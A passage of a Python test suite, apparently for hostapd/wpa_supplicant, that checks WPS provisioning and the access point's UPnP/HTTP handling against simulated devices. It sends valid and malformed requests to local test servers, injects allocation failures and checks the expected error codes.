"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#GetDeviceInfo",
'"urn:schemas-wifialliance-org:service:WFAWLANConfig:1"',
'"urn:schemas-wifialliance-org:service:WFAWLANConfig:123#GetDevice']:
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo",
include_soap_action=False,
soap_action_override=act)
if resp.status != 401:
raise Exception("Unexpected HTTP response: %d" % resp.status)
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
dev = resp.read().decode()
if "NewDeviceInfo" not in dev:
raise Exception("Unexpected GetDeviceInfo response")
logger.debug("PutMessage without required parameters")
resp = upnp_soap_action(conn, ctrlurl.path, "PutMessage")
if resp.status != 600:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("PutWLANResponse without required parameters")
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse")
if resp.status != 600:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("SetSelectedRegistrar from unregistered ER")
resp = upnp_soap_action(conn, ctrlurl.path, "SetSelectedRegistrar")
if resp.status != 501:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Unknown action")
resp = upnp_soap_action(conn, ctrlurl.path, "Unknown")
if resp.status != 401:
raise Exception("Unexpected HTTP response: %d" % resp.status)
def test_ap_wps_upnp_subscribe(dev, apdev):
"""WPS AP and UPnP event subscription"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
urls = upnp_get_urls(location)
eventurl = urlparse(urls['event_sub_url'])
url = urlparse(location)
conn = HTTPConnection(url.netloc)
#conn.set_debuglevel(1)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", "hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:foobar",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Valid subscription")
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
logger.debug("Invalid re-subscription")
headers = { "NT": "upnp:event",
"sid": "123456734567854",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid re-subscription")
headers = { "NT": "upnp:event",
"sid": "uuid:123456734567854",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid re-subscription")
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"sid": sid,
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("SID mismatch in re-subscription")
headers = { "NT": "upnp:event",
"sid": "uuid:4c2bca79-1ff4-4e43-85d4-952a2b8a51fb",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Valid re-subscription")
headers = { "NT": "upnp:event",
"sid": sid,
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid2 = resp.getheader("sid")
logger.debug("Subscription SID " + sid2)
if sid != sid2:
raise Exception("Unexpected SID change")
logger.debug("Valid re-subscription")
headers = { "NT": "upnp:event",
"sid": "uuid: \t \t" + sid.split(':')[1],
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid unsubscription")
headers = { "sid": sid }
conn.request("UNSUBSCRIBE", "/hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "foo": "bar" }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Valid unsubscription")
headers = { "sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Unsubscription for not existing SID")
headers = { "sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid unsubscription")
headers = { "sid": " \t \tfoo" }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid unsubscription")
headers = { "sid": "uuid:\t \tfoo" }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid unsubscription")
headers = { "NT": "upnp:event",
"sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Valid subscription with multiple callbacks")
headers = { "callback": '<http://127.0.0.1:12345/event> <http://127.0.0.1:12345/event>\t<http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
# Force subscription to be deleted due to errors
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
with alloc_fail(hapd, 1, "event_build_message"):
for i in range(10):
dev[1].dump_monitor()
dev[2].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[2].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
dev[2].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[2].request("WPS_CANCEL")
if i % 4 == 1:
time.sleep(1)
else:
time.sleep(0.1)
time.sleep(0.2)
headers = { "sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "", headers)
resp = conn.getresponse()
if resp.status != 200 and resp.status != 412:
raise Exception("Unexpected HTTP response for UNSUBSCRIBE: %d" % resp.status)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
with alloc_fail(hapd, 1, "http_client_addr;event_send_start"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response for SUBSCRIBE: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
headers = { "sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response for UNSUBSCRIBE: %d" % resp.status)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
with alloc_fail(hapd, 1, "=event_add"):
for i in range(2):
dev[1].dump_monitor()
dev[2].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[2].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
dev[2].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[2].request("WPS_CANCEL")
if i == 0:
time.sleep(1)
else:
time.sleep(0.1)
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "wpabuf_dup;event_add"):
dev[1].dump_monitor()
dev[2].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[2].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
dev[2].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[2].request("WPS_CANCEL")
time.sleep(0.1)
with fail_test(hapd, 1, "os_get_random;uuid_make;subscription_start"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "=subscription_start"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "callback": '',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "callback": ' <',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
with alloc_fail(hapd, 1, "wpabuf_alloc;subscription_first_event"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "event_add;subscription_first_event"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "subscr_addr_add_url"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 2, "subscr_addr_add_url"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
for i in range(6):
headers = { "callback": '<http://127.0.0.1:%d/event>' % (12345 + i),
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "=upnp_wps_device_send_wlan_event"):
dev[1].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
time.sleep(0.1)
with alloc_fail(hapd, 1, "wpabuf_alloc;upnp_wps_device_send_event"):
dev[1].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
time.sleep(0.1)
with alloc_fail(hapd, 1,
"base64_gen_encode;?base64_encode;upnp_wps_device_send_wlan_event"):
dev[1].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
time.sleep(0.1)
hapd.disable()
with alloc_fail(hapd, 1, "get_netif_info"):
if "FAIL" not in hapd.request("ENABLE"):
raise Exception("ENABLE succeeded during OOM")
def test_ap_wps_upnp_subscribe_events(dev, apdev):
"""WPS AP and UPnP event subscription and many events"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
urls = upnp_get_urls(location)
eventurl = urlparse(urls['event_sub_url'])
class WPSERHTTPServer(StreamRequestHandler):
def handle(self):
data = self.rfile.readline().strip()
logger.debug(data)
self.wfile.write(gen_wps_event())
server = MyTCPServer(("127.0.0.1", 12345), WPSERHTTPServer)
server.timeout = 1
url = urlparse(location)
conn = HTTPConnection(url.netloc)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
# Fetch the first event message
server.handle_request()
# Force subscription event queue to reach the maximum length by generating
# new proxied events without the ER fetching any of the pending events.
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
for i in range(16):
dev[1].dump_monitor()
dev[2].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[2].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
dev[2].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[2].request("WPS_CANCEL")
if i % 4 == 1:
time.sleep(1)
else:
time.sleep(0.1)
hapd.request("WPS_PIN any 12345670")
dev[1].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
ev = dev[1].wait_event(["WPS-SUCCESS"], timeout=10)
if ev is None:
raise Exception("WPS success not reported")
# Close the WPS ER HTTP server without fetching all the pending events.
# This tests hostapd code path that clears subscription and the remaining
# event queue when the interface is deinitialized.
server.handle_request()
server.server_close()
dev[1].wait_connected()
def test_ap_wps_upnp_http_proto(dev, apdev):
"""WPS AP and UPnP/HTTP protocol testing"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
url = urlparse(location)
conn = HTTPConnection(url.netloc, timeout=0.2)
#conn.set_debuglevel(1)
conn.request("HEAD", "hello")
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected response to HEAD: " + str(resp.status))
conn.close()
for cmd in [ "PUT", "DELETE", "TRACE", "CONNECT", "M-SEARCH", "M-POST" ]:
try:
conn.request(cmd, "hello")
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
headers = { "Content-Length": 'abc' }
conn.request("HEAD", "hello", "\r\n\r\n", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
headers = { "Content-Length": '-10' }
conn.request("HEAD", "hello", "\r\n\r\n", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
headers = { "Content-Length": '10000000000000' }
conn.request("HEAD", "hello", "\r\n\r\nhello", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
headers = { "Transfer-Encoding": 'abc' }
conn.request("HEAD", "hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected response to HEAD: " + str(resp.status))
conn.close()
headers = { "Transfer-Encoding": 'chunked' }
conn.request("HEAD", "hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected response to HEAD: " + str(resp.status))
conn.close()
# Too long a header
conn.request("HEAD", 5000 * 'A')
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
# Long URL but within header length limits
conn.request("HEAD", 3000 * 'A')
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected response to HEAD: " + str(resp.status))
conn.close()
headers = { "Content-Length": '20' }
conn.request("POST", "hello", 10 * 'A' + "\r\n\r\n", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
conn.request("POST", "hello", 5000 * 'A' + "\r\n\r\n")
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn.close()
conn.request("POST", "hello", 60000 * 'A' + "\r\n\r\n")
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
def test_ap_wps_upnp_http_proto_chunked(dev, apdev):
"""WPS AP and UPnP/HTTP protocol testing for chunked encoding"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
url = urlparse(location)
conn = HTTPConnection(url.netloc)
#conn.set_debuglevel(1)
headers = { "Transfer-Encoding": 'chunked' }
conn.request("POST", "hello",
"a\r\nabcdefghij\r\n" + "2\r\nkl\r\n" + "0\r\n\r\n",
headers)
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn.close()
conn.putrequest("POST", "hello")
conn.putheader('Transfer-Encoding', 'chunked')
conn.endheaders()
conn.send(b"a\r\nabcdefghij\r\n")
time.sleep(0.1)
conn.send(b"2\r\nkl\r\n")
conn.send(b"0\r\n\r\n")
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn.close()
conn.putrequest("POST", "hello")
conn.putheader('Transfer-Encoding', 'chunked')
conn.endheaders()
completed = False
try:
for i in range(20000):
conn.send(b"1\r\nZ\r\n")
conn.send(b"0\r\n\r\n")
resp = conn.getresponse()
completed = True
except Exception as e:
pass
conn.close()
if completed:
raise Exception("Too long chunked request did not result in connection reset")
headers = { "Transfer-Encoding": 'chunked' }
conn.request("POST", "hello", "80000000\r\na", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
conn.request("POST", "hello", "10000000\r\na", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
@remote_compatible
def test_ap_wps_disabled(dev, apdev):
"""WPS operations while WPS is disabled"""
ssid = "test-wps-disabled"
hapd = hostapd.add_ap(apdev[0], { "ssid": ssid })
if "FAIL" not in hapd.request("WPS_PBC"):
raise Exception("WPS_PBC succeeded unexpectedly")
if "FAIL" not in hapd.request("WPS_CANCEL"):
raise Exception("WPS_CANCEL succeeded unexpectedly")
def test_ap_wps_mixed_cred(dev, apdev):
"""WPS 2.0 STA merging mixed mode WPA/WPA2 credentials"""
ssid = "test-wps-wep"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"skip_cred_build": "1", "extra_cred": "wps-mixed-cred" }
hapd = hostapd.add_ap(apdev[0], params)
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("WPS-SUCCESS event timed out")
nets = dev[0].list_networks()
if len(nets) != 1:
raise Exception("Unexpected number of network blocks")
id = nets[0]['id']
proto = dev[0].get_network(id, "proto")
if proto != "WPA RSN":
raise Exception("Unexpected merged proto field value: " + proto)
pairwise = dev[0].get_network(id, "pairwise")
p = pairwise.split()
if "CCMP" not in p or "TKIP" not in p:
raise Exception("Unexpected merged pairwise field value: " + pairwise)
@remote_compatible
def test_ap_wps_while_connected(dev, apdev):
"""WPS PBC provisioning while connected to another AP"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
hostapd.add_ap(apdev[1], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['bssid'] != apdev[0]['bssid']:
raise Exception("Unexpected BSSID")
@remote_compatible
def test_ap_wps_while_connected_no_autoconnect(dev, apdev):
"""WPS PBC provisioning while connected to another AP and STA_AUTOCONNECT disabled"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
hostapd.add_ap(apdev[1], { "ssid": "open" })
try:
dev[0].request("STA_AUTOCONNECT 0")
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['bssid'] != apdev[0]['bssid']:
raise Exception("Unexpected BSSID")
finally:
dev[0].request("STA_AUTOCONNECT 1")
@remote_compatible
def test_ap_wps_from_event(dev, apdev):
"""WPS PBC event on AP to enable PBC"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
hapd.dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
ev = hapd.wait_event(['WPS-ENROLLEE-SEEN'], timeout=15)
if ev is None:
raise Exception("No WPS-ENROLLEE-SEEN event on AP")
vals = ev.split(' ')
if vals[1] != dev[0].p2p_interface_addr():
raise Exception("Unexpected enrollee address: " + vals[1])
if vals[5] != '4':
raise Exception("Unexpected Device Password Id: " + vals[5])
hapd.request("WPS_PBC")
dev[0].wait_connected(timeout=30)
def test_ap_wps_ap_scan_2(dev, apdev):
"""AP_SCAN 2 for WPS"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
hapd.request("WPS_PBC")
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="force_connect_cmd=1")
wpas.dump_monitor()
if "OK" not in wpas.request("AP_SCAN 2"):
raise Exception("Failed to set AP_SCAN 2")
wpas.flush_scan_cache()
wpas.scan_for_bss(apdev[0]['bssid'], freq="2412")
wpas.dump_monitor()
wpas.request("WPS_PBC " + apdev[0]['bssid'])
ev = wpas.wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS-SUCCESS event timed out")
wpas.wait_connected(timeout=30)
wpas.dump_monitor()
wpas.request("DISCONNECT")
wpas.wait_disconnected()
id = wpas.list_networks()[0]['id']
pairwise = wpas.get_network(id, "pairwise")
if "CCMP" not in pairwise.split():
raise Exception("Unexpected pairwise parameter value: " + pairwise)
group = wpas.get_network(id, "group")
if "CCMP" not in group.split():
raise Exception("Unexpected group parameter value: " + group)
# Need to select a single cipher for ap_scan=2 testing
wpas.set_network(id, "pairwise", "CCMP")
wpas.set_network(id, "group", "CCMP")
wpas.request("BSS_FLUSH 0")
wpas.dump_monitor()
wpas.request("REASSOCIATE")
wpas.wait_connected(timeout=30)
wpas.dump_monitor()
@remote_compatible
def test_ap_wps_eapol_workaround(dev, apdev):
"""EAPOL workaround code path for 802.1X header length mismatch"""
ssid = "test-wps"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1" })
bssid = apdev[0]['bssid']
hapd.request("SET ext_eapol_frame_io 1")
dev[0].request("SET ext_eapol_frame_io 1")
hapd.request("WPS_PBC")
dev[0].request("WPS_PBC")
ev = hapd.wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from hostapd")
res = dev[0].request("EAPOL_RX " + bssid + " 020000040193000501FFFF")
if "OK" not in res:
raise Exception("EAPOL_RX to wpa_supplicant failed")
def test_ap_wps_iteration(dev, apdev):
"""WPS PIN and iterate through APs without selected registrar"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
ssid2 = "test-wps-conf2"
hapd2 = hostapd.add_ap(apdev[1],
{ "ssid": ssid2, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
dev[0].dump_monitor()
pin = dev[0].request("WPS_PIN any")
# Wait for iteration through all WPS APs to happen before enabling any
# Registrar.
for i in range(2):
ev = dev[0].wait_event(["Associated with"], timeout=30)
if ev is None:
raise Exception("No association seen")
ev = dev[0].wait_event(["WPS-M2D"], timeout=10)
if ev is None:
raise Exception("No M2D from AP")
dev[0].wait_disconnected()
# Verify that each AP requested PIN
ev = hapd.wait_event(["WPS-PIN-NEEDED"], timeout=1)
if ev is None:
raise Exception("No WPS-PIN-NEEDED event from AP")
ev = hapd2.wait_event(["WPS-PIN-NEEDED"], timeout=1)
if ev is None:
raise Exception("No WPS-PIN-NEEDED event from AP2")
# Provide PIN to one of the APs and verify that connection gets formed
hapd.request("WPS_PIN any " + pin)
dev[0].wait_connected(timeout=30)
def test_ap_wps_iteration_error(dev, apdev):
"""WPS AP iteration on no Selected Registrar and error case with an AP"""
ssid = "test-wps-conf-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1" })
hapd.request("SET ext_eapol_frame_io 1")
bssid = apdev[0]['bssid']
pin = dev[0].wps_read_pin()
dev[0].request("WPS_PIN any " + pin)
ev = hapd.wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("No EAPOL-TX (EAP-Request/Identity) from hostapd")
dev[0].request("EAPOL_RX " + bssid + " " + ev.split(' ')[2])
ev = hapd.wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("No EAPOL-TX (EAP-WSC/Start) from hostapd")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("No CTRL-EVENT-EAP-STARTED")
# Do not forward any more EAPOL frames to test wpa_supplicant behavior for
# a case with an incorrectly behaving WPS AP.
# Start the real target AP and activate registrar on it.
hapd2 = hostapd.add_ap(apdev[1],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1" })
